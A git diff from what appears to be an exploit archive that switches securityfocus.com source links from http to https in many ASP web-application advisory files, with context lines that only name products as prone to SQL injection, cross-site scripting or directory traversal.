diff --git a/exploits/asp/webapps/29110.txt b/exploits/asp/webapps/29110.txt index d11bbb0fb..aa37ab3f9 100644 --- a/exploits/asp/webapps/29110.txt +++ b/exploits/asp/webapps/29110.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21191/info +source: https://www.securityfocus.com/bid/21191/info Grandora Rialto is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29111.txt b/exploits/asp/webapps/29111.txt index 1248f718c..4f2442f49 100644 --- a/exploits/asp/webapps/29111.txt +++ b/exploits/asp/webapps/29111.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21191/info +source: https://www.securityfocus.com/bid/21191/info Grandora Rialto is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29112.txt b/exploits/asp/webapps/29112.txt index 71152e51f..9620add2b 100644 --- a/exploits/asp/webapps/29112.txt +++ b/exploits/asp/webapps/29112.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21191/info +source: https://www.securityfocus.com/bid/21191/info Grandora Rialto is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29113.txt b/exploits/asp/webapps/29113.txt index 24c3d5f34..736ea33e9 100644 --- a/exploits/asp/webapps/29113.txt +++ b/exploits/asp/webapps/29113.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21191/info +source: https://www.securityfocus.com/bid/21191/info Grandora Rialto is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. 
diff --git a/exploits/asp/webapps/29114.txt b/exploits/asp/webapps/29114.txt index b25fcb0f3..8b06a8cac 100644 --- a/exploits/asp/webapps/29114.txt +++ b/exploits/asp/webapps/29114.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21191/info +source: https://www.securityfocus.com/bid/21191/info Grandora Rialto is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29115.txt b/exploits/asp/webapps/29115.txt index 3acfd8994..3c0127646 100644 --- a/exploits/asp/webapps/29115.txt +++ b/exploits/asp/webapps/29115.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21191/info +source: https://www.securityfocus.com/bid/21191/info Grandora Rialto is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29116.txt b/exploits/asp/webapps/29116.txt index e9f426e9d..fb771340c 100644 --- a/exploits/asp/webapps/29116.txt +++ b/exploits/asp/webapps/29116.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21191/info +source: https://www.securityfocus.com/bid/21191/info Grandora Rialto is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29117.txt b/exploits/asp/webapps/29117.txt index 8826bad13..6839bb87a 100644 --- a/exploits/asp/webapps/29117.txt +++ b/exploits/asp/webapps/29117.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21191/info +source: https://www.securityfocus.com/bid/21191/info Grandora Rialto is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. 
diff --git a/exploits/asp/webapps/29118.txt b/exploits/asp/webapps/29118.txt index 55eac6297..231df4e3b 100644 --- a/exploits/asp/webapps/29118.txt +++ b/exploits/asp/webapps/29118.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21192/info +source: https://www.securityfocus.com/bid/21192/info eClassifieds is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29119.txt b/exploits/asp/webapps/29119.txt index 68a1a5e87..dc27243ca 100644 --- a/exploits/asp/webapps/29119.txt +++ b/exploits/asp/webapps/29119.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21192/info +source: https://www.securityfocus.com/bid/21192/info eClassifieds is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29120.txt b/exploits/asp/webapps/29120.txt index ba40d5c39..1807abc1b 100644 --- a/exploits/asp/webapps/29120.txt +++ b/exploits/asp/webapps/29120.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21192/info +source: https://www.securityfocus.com/bid/21192/info eClassifieds is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29121.txt b/exploits/asp/webapps/29121.txt index fe8807ff7..5860043fd 100644 --- a/exploits/asp/webapps/29121.txt +++ b/exploits/asp/webapps/29121.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21193/info +source: https://www.securityfocus.com/bid/21193/info eHome is prone to multiple input-validation vulnerabilities, including cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. 
diff --git a/exploits/asp/webapps/29122.txt b/exploits/asp/webapps/29122.txt index b64fd5306..5f56b0427 100644 --- a/exploits/asp/webapps/29122.txt +++ b/exploits/asp/webapps/29122.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21193/info +source: https://www.securityfocus.com/bid/21193/info eHome is prone to multiple input-validation vulnerabilities, including cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29123.txt b/exploits/asp/webapps/29123.txt index 4b6fc11ca..cba702349 100644 --- a/exploits/asp/webapps/29123.txt +++ b/exploits/asp/webapps/29123.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21193/info +source: https://www.securityfocus.com/bid/21193/info eHome is prone to multiple input-validation vulnerabilities, including cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29124.txt b/exploits/asp/webapps/29124.txt index 9f666e79e..199d08d86 100644 --- a/exploits/asp/webapps/29124.txt +++ b/exploits/asp/webapps/29124.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21193/info +source: https://www.securityfocus.com/bid/21193/info eHome is prone to multiple input-validation vulnerabilities, including cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29126.txt b/exploits/asp/webapps/29126.txt index 42492dd92..0802c3487 100644 --- a/exploits/asp/webapps/29126.txt +++ b/exploits/asp/webapps/29126.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21194/info +source: https://www.securityfocus.com/bid/21194/info Gnews Publisher is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. 
diff --git a/exploits/asp/webapps/29133.txt b/exploits/asp/webapps/29133.txt index 8c661af4e..ae9b521fa 100644 --- a/exploits/asp/webapps/29133.txt +++ b/exploits/asp/webapps/29133.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21197/info +source: https://www.securityfocus.com/bid/21197/info Rapid Classified is prone to multiple input-validation issues, including multiple cross-site scripting issues and an SQL-injection issue, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29134.txt b/exploits/asp/webapps/29134.txt index 0494cb186..5476a8106 100644 --- a/exploits/asp/webapps/29134.txt +++ b/exploits/asp/webapps/29134.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21197/info +source: https://www.securityfocus.com/bid/21197/info Rapid Classified is prone to multiple input-validation issues, including multiple cross-site scripting issues and an SQL-injection issue, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29135.txt b/exploits/asp/webapps/29135.txt index 3f3cd4176..ee020938d 100644 --- a/exploits/asp/webapps/29135.txt +++ b/exploits/asp/webapps/29135.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21197/info +source: https://www.securityfocus.com/bid/21197/info Rapid Classified is prone to multiple input-validation issues, including multiple cross-site scripting issues and an SQL-injection issue, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29136.txt b/exploits/asp/webapps/29136.txt index 9a6574dd9..74cd6b23b 100644 --- a/exploits/asp/webapps/29136.txt +++ b/exploits/asp/webapps/29136.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21197/info +source: https://www.securityfocus.com/bid/21197/info Rapid Classified is prone to multiple input-validation issues, including multiple cross-site scripting issues and an SQL-injection issue, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29137.txt b/exploits/asp/webapps/29137.txt index b427e797b..c108c31d7 100644 --- a/exploits/asp/webapps/29137.txt +++ b/exploits/asp/webapps/29137.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21197/info +source: https://www.securityfocus.com/bid/21197/info Rapid Classified is prone to multiple input-validation issues, including multiple cross-site scripting issues and an SQL-injection issue, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29141.txt b/exploits/asp/webapps/29141.txt index 4506e8380..c9089ecd8 100644 --- a/exploits/asp/webapps/29141.txt +++ b/exploits/asp/webapps/29141.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21198/info +source: https://www.securityfocus.com/bid/21198/info The Classified Ad System is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29142.txt b/exploits/asp/webapps/29142.txt index 24eaec0ed..ba03f9e1c 100644 --- a/exploits/asp/webapps/29142.txt +++ b/exploits/asp/webapps/29142.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21199/info +source: https://www.securityfocus.com/bid/21199/info Klf-Realty is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29143.txt b/exploits/asp/webapps/29143.txt index cb5a8e188..d281edde2 100644 --- a/exploits/asp/webapps/29143.txt 
+++ b/exploits/asp/webapps/29143.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21199/info +source: https://www.securityfocus.com/bid/21199/info Klf-Realty is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29151.txt b/exploits/asp/webapps/29151.txt index 18b7cf0df..39004652a 100644 --- a/exploits/asp/webapps/29151.txt +++ b/exploits/asp/webapps/29151.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21225/info +source: https://www.securityfocus.com/bid/21225/info Link Exchange Lite is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29152.txt b/exploits/asp/webapps/29152.txt index 17c223df0..fcab3c565 100644 --- a/exploits/asp/webapps/29152.txt +++ b/exploits/asp/webapps/29152.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21226/info +source: https://www.securityfocus.com/bid/21226/info JiRos Links Manager is prone to multiple input-validation vulnerabilities, including SQL- and HTML-injection issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29153.txt b/exploits/asp/webapps/29153.txt index 7849f5615..99403d712 100644 --- a/exploits/asp/webapps/29153.txt +++ b/exploits/asp/webapps/29153.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21226/info +source: https://www.securityfocus.com/bid/21226/info JiRos Links Manager is prone to multiple input-validation vulnerabilities, including SQL- and HTML-injection issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29154.txt b/exploits/asp/webapps/29154.txt index 9a7144b4e..0876b79fe 100644 --- a/exploits/asp/webapps/29154.txt +++ b/exploits/asp/webapps/29154.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21230/info +source: https://www.securityfocus.com/bid/21230/info Creascripts creadirectory is prone to multiple input-validation vulnerabilities, inculding SQL-injection issues and a cross-site scripting issue, because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29155.txt b/exploits/asp/webapps/29155.txt index a0746f7b5..8b62c5c45 100644 --- a/exploits/asp/webapps/29155.txt +++ b/exploits/asp/webapps/29155.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21230/info +source: https://www.securityfocus.com/bid/21230/info Creascripts creadirectory is prone to multiple input-validation vulnerabilities, inculding SQL-injection issues and a cross-site scripting issue, because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29156.txt b/exploits/asp/webapps/29156.txt index bd7008cf2..5c52c934b 100644 --- a/exploits/asp/webapps/29156.txt +++ b/exploits/asp/webapps/29156.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21230/info +source: https://www.securityfocus.com/bid/21230/info Creascripts creadirectory is prone to multiple input-validation vulnerabilities, inculding SQL-injection issues and a cross-site scripting issue, because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29174.txt b/exploits/asp/webapps/29174.txt index 0daab3fc7..bfe44e4ef 100644 --- a/exploits/asp/webapps/29174.txt +++ b/exploits/asp/webapps/29174.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21273/info +source: https://www.securityfocus.com/bid/21273/info MidiCart ASP is prone to an SQL injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29176.txt b/exploits/asp/webapps/29176.txt index 8bd462dca..30db83342 100644 
--- a/exploits/asp/webapps/29176.txt +++ b/exploits/asp/webapps/29176.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21279/info +source: https://www.securityfocus.com/bid/21279/info ASP ListPics is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29178.txt b/exploits/asp/webapps/29178.txt index d40b3d93f..39b6e9953 100644 --- a/exploits/asp/webapps/29178.txt +++ b/exploits/asp/webapps/29178.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21282/info +source: https://www.securityfocus.com/bid/21282/info Fixit iDMS Pro is prone to multiple input-validation vulnerabilities, including SQL-injection issues and an HTML-injection issue, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29179.txt b/exploits/asp/webapps/29179.txt index 9f94305b8..7406ef782 100644 --- a/exploits/asp/webapps/29179.txt +++ b/exploits/asp/webapps/29179.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21282/info +source: https://www.securityfocus.com/bid/21282/info Fixit iDMS Pro is prone to multiple input-validation vulnerabilities, including SQL-injection issues and an HTML-injection issue, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29180.txt b/exploits/asp/webapps/29180.txt index c03975b1e..7c453a88b 100644 --- a/exploits/asp/webapps/29180.txt +++ b/exploits/asp/webapps/29180.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21286/info +source: https://www.securityfocus.com/bid/21286/info SIAP CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29189.txt b/exploits/asp/webapps/29189.txt index 788220568..d6e9031ff 100644 --- a/exploits/asp/webapps/29189.txt 
+++ b/exploits/asp/webapps/29189.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21289/info +source: https://www.securityfocus.com/bid/21289/info fipsShop is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29191.txt b/exploits/asp/webapps/29191.txt index 859a0a5f5..9312722eb 100644 --- a/exploits/asp/webapps/29191.txt +++ b/exploits/asp/webapps/29191.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21302/info +source: https://www.securityfocus.com/bid/21302/info ClickContact is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29192.txt b/exploits/asp/webapps/29192.txt index 2481f54fd..51453b624 100644 --- a/exploits/asp/webapps/29192.txt +++ b/exploits/asp/webapps/29192.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21310/info +source: https://www.securityfocus.com/bid/21310/info Clickblog is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29193.txt b/exploits/asp/webapps/29193.txt index 5e1118375..3328ae479 100644 --- a/exploits/asp/webapps/29193.txt +++ b/exploits/asp/webapps/29193.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21311/info +source: https://www.securityfocus.com/bid/21311/info Click Gallery is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29195.txt b/exploits/asp/webapps/29195.txt index 9287dfaee..23a62ee3b 100644 --- a/exploits/asp/webapps/29195.txt +++ b/exploits/asp/webapps/29195.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21319/info +source: https://www.securityfocus.com/bid/21319/info uPhotoGallery is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29196.txt b/exploits/asp/webapps/29196.txt index aef471e34..866288251 100644 --- a/exploits/asp/webapps/29196.txt +++ b/exploits/asp/webapps/29196.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21319/info +source: https://www.securityfocus.com/bid/21319/info uPhotoGallery is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29197.txt b/exploits/asp/webapps/29197.txt index 1a28b8f61..9e1a7c40a 100644 --- a/exploits/asp/webapps/29197.txt +++ b/exploits/asp/webapps/29197.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21323/info +source: https://www.securityfocus.com/bid/21323/info Evolve Shopping Cart is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29216.html b/exploits/asp/webapps/29216.html index 26a6ed050..3e0eabf60 100644 --- a/exploits/asp/webapps/29216.html +++ b/exploits/asp/webapps/29216.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21398/info +source: https://www.securityfocus.com/bid/21398/info Aspee Ziyaretçi Defteri is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29219.txt b/exploits/asp/webapps/29219.txt index 4b6d60915..ffb616f9a 100644 --- a/exploits/asp/webapps/29219.txt +++ b/exploits/asp/webapps/29219.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21405/info +source: https://www.securityfocus.com/bid/21405/info Multiple DuWare products are prone to multiple SQL-injection vulnerabilities because they fail to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/29220.html b/exploits/asp/webapps/29220.html index 4f0e0df57..8368a3ac7 100644 --- a/exploits/asp/webapps/29220.html +++ b/exploits/asp/webapps/29220.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21418/info +source: https://www.securityfocus.com/bid/21418/info Metyus Okul Yonetim Sistemi is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29224.txt b/exploits/asp/webapps/29224.txt index d715560b3..535167350 100644 --- a/exploits/asp/webapps/29224.txt +++ b/exploits/asp/webapps/29224.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21426/info +source: https://www.securityfocus.com/bid/21426/info Uapplication Uguestbook is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29227.txt b/exploits/asp/webapps/29227.txt index c0d5cf3a7..bff5ec62b 100644 --- a/exploits/asp/webapps/29227.txt +++ b/exploits/asp/webapps/29227.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21428/info +source: https://www.securityfocus.com/bid/21428/info Vt-Forum Lite is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29228.txt b/exploits/asp/webapps/29228.txt index bbd586b42..ad2635ec9 100644 --- a/exploits/asp/webapps/29228.txt +++ b/exploits/asp/webapps/29228.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21428/info +source: https://www.securityfocus.com/bid/21428/info Vt-Forum Lite is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29231.txt b/exploits/asp/webapps/29231.txt index ce82978a1..732fe8142 100644 --- a/exploits/asp/webapps/29231.txt +++ b/exploits/asp/webapps/29231.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21463/info +source: https://www.securityfocus.com/bid/21463/info The 'dol storye' application is prone to multiple SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29240.txt b/exploits/asp/webapps/29240.txt index b9023384b..f9ec2b560 100644 --- a/exploits/asp/webapps/29240.txt +++ b/exploits/asp/webapps/29240.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21511/info +source: https://www.securityfocus.com/bid/21511/info Ã?ilem Haber Free Edition is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29241.txt b/exploits/asp/webapps/29241.txt index 49bb20c4d..476439a0d 100644 --- a/exploits/asp/webapps/29241.txt +++ b/exploits/asp/webapps/29241.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21512/info +source: https://www.securityfocus.com/bid/21512/info MaviPortal is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29271.txt b/exploits/asp/webapps/29271.txt index 308287c25..56a0acf83 100644 --- a/exploits/asp/webapps/29271.txt +++ b/exploits/asp/webapps/29271.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21521/info +source: https://www.securityfocus.com/bid/21521/info AppIntellect SpotLight CRM is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29276.txt b/exploits/asp/webapps/29276.txt index 06d7fd4bb..dd641810a 100644 --- a/exploits/asp/webapps/29276.txt +++ b/exploits/asp/webapps/29276.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21536/info +source: https://www.securityfocus.com/bid/21536/info Request For Travel is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29288.txt b/exploits/asp/webapps/29288.txt index 93ca993c3..95a257cd9 100644 --- a/exploits/asp/webapps/29288.txt +++ b/exploits/asp/webapps/29288.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21620/info +source: https://www.securityfocus.com/bid/21620/info Omniture SiteCatalyst is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29293.txt b/exploits/asp/webapps/29293.txt index e5df6683f..ea81a028c 100644 --- a/exploits/asp/webapps/29293.txt +++ b/exploits/asp/webapps/29293.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21626/info +source: https://www.securityfocus.com/bid/21626/info Contra Haber Sistemi is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29333.txt b/exploits/asp/webapps/29333.txt index c3f2fecbb..b1d57db77 100644 --- a/exploits/asp/webapps/29333.txt +++ b/exploits/asp/webapps/29333.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21726/info +source: https://www.securityfocus.com/bid/21726/info Efkan Forum is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29336.txt b/exploits/asp/webapps/29336.txt index dd192ec76..d644e5ea8 100644 --- a/exploits/asp/webapps/29336.txt +++ b/exploits/asp/webapps/29336.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21732/info +source: https://www.securityfocus.com/bid/21732/info Chatwm is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29357.txt b/exploits/asp/webapps/29357.txt index 114582ff2..a9f6b7064 100644 --- a/exploits/asp/webapps/29357.txt +++ b/exploits/asp/webapps/29357.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21786/info +source: https://www.securityfocus.com/bid/21786/info Hosting Controller is prone to a directory-traversal vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29358.txt b/exploits/asp/webapps/29358.txt index 8c95ef59d..232869d6e 100644 --- a/exploits/asp/webapps/29358.txt +++ b/exploits/asp/webapps/29358.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21788/info +source: https://www.securityfocus.com/bid/21788/info DMXReady Secure Login Manager is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/29359.txt b/exploits/asp/webapps/29359.txt index 3881b8aa0..0b3227601 100644 --- a/exploits/asp/webapps/29359.txt +++ b/exploits/asp/webapps/29359.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21788/info +source: https://www.securityfocus.com/bid/21788/info DMXReady Secure Login Manager is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/29360.txt b/exploits/asp/webapps/29360.txt index a5bdd011f..3bd31c789 100644 --- a/exploits/asp/webapps/29360.txt +++ b/exploits/asp/webapps/29360.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21788/info +source: https://www.securityfocus.com/bid/21788/info DMXReady Secure Login Manager is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/29361.txt b/exploits/asp/webapps/29361.txt index 7a7b80f57..3a7a943f5 100644 --- a/exploits/asp/webapps/29361.txt +++ b/exploits/asp/webapps/29361.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21788/info +source: https://www.securityfocus.com/bid/21788/info DMXReady Secure Login Manager is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/29373.txt b/exploits/asp/webapps/29373.txt index 31c17df49..d009524fd 100644 --- a/exploits/asp/webapps/29373.txt +++ b/exploits/asp/webapps/29373.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21822/info +source: https://www.securityfocus.com/bid/21822/info Spooky Login is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29385.txt b/exploits/asp/webapps/29385.txt index 5a5b7f48d..4b6e1b5af 100644 --- a/exploits/asp/webapps/29385.txt +++ b/exploits/asp/webapps/29385.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21889/info +source: https://www.securityfocus.com/bid/21889/info Kolayindir Download is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29398.txt b/exploits/asp/webapps/29398.txt index 84aeaffdd..255f79d9a 100644 --- a/exploits/asp/webapps/29398.txt +++ b/exploits/asp/webapps/29398.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21905/info +source: https://www.securityfocus.com/bid/21905/info Shopstorenow E-commerce Shopping Cart is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29401.txt b/exploits/asp/webapps/29401.txt index 5c96f6715..57fb2b630 100644 --- a/exploits/asp/webapps/29401.txt +++ b/exploits/asp/webapps/29401.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21929/info +source: https://www.securityfocus.com/bid/21929/info Createauction is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29456.txt b/exploits/asp/webapps/29456.txt index 306f4ee29..3b913349d 100644 --- a/exploits/asp/webapps/29456.txt +++ b/exploits/asp/webapps/29456.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22052/info +source: https://www.securityfocus.com/bid/22052/info InstantForum.NET is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/29457.txt b/exploits/asp/webapps/29457.txt index 682efef52..f1871c2fc 100644 --- a/exploits/asp/webapps/29457.txt +++ b/exploits/asp/webapps/29457.txt 
